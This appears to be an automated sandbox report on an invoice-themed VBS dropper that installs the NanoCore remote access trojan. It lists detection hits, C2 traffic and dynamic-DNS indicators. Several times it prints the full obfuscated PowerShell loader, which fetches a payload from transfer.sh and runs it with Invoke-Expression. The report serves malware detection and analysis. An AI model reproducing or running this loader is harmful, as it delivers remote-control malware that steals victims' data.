-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132761534143789254.964.DefaultAppDomain.powershell

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for domain / URL

Show sources

Source: newjan.duckdns.org

Virustotal: Detection: 10%

Perma Link

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49689 version: TLS 1.0

Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000003.416431305.00000146FE64B000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49694 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49695 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49696 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49697 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49698 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49699 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49700 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49701 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49702 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49703 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49704 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49705 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49706 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49707 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49708 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49709 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49710 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49711 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49712 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49713 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49714 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49715 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49716 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49717 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49718 -> 194.147.140.20:6700
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49719 -> 194.147.140.20:6700

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: newjan.duckdns.org

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: global traffic	HTTP traffic detected: GET /DJr8t4/edrf.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fzfQo2/sewwed.txt HTTP/1.1Host: transfer.sh

Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.5:49689 version: TLS 1.0

Source: global traffic

TCP traffic: 192.168.2.5:49694 -> 194.147.140.20:6700

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443

Source: aspnet_compiler.exe, 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.419051685.0000014680442000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.418005848.0000014680001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.419051685.0000014680442000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.418451254.00000146802BB000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh
Source: powershell.exe, 00000001.00000002.418295936.000001468020C000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/DJr8t4/edrf.txt(
Source: powershell.exe, 00000001.00000002.419051685.0000014680442000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/fzfQo2/sewwed.txt(

Source: unknown

DNS traffic detected: queries for: transfer.sh

Source: global traffic	HTTP traffic detected: GET /DJr8t4/edrf.txt HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /fzfQo2/sewwed.txt HTTP/1.1Host: transfer.sh

E-Banking Fraud:

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 10.3.aspnet_compiler.exe.4488eef.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 10.3.aspnet_compiler.exe.446ee96.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 10.3.aspnet_compiler.exe.44834c1.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 10.3.aspnet_compiler.exe.44834c1.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 10.3.aspnet_compiler.exe.4488eef.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 10.3.aspnet_compiler.exe.4488eef.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 10.3.aspnet_compiler.exe.446ee96.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 10.3.aspnet_compiler.exe.446ee96.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000A.00000003.619763288.0000000004466000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: aspnet_compiler.exe PID: 2272, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace(''
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/DJr8t4/edrfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace(''			Jump to behavior

Very long command line found

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 3045
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 3045			Jump to behavior

Source: 9 ITEMS INVOICE RECEIPT.vbs, type: SAMPLE	Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
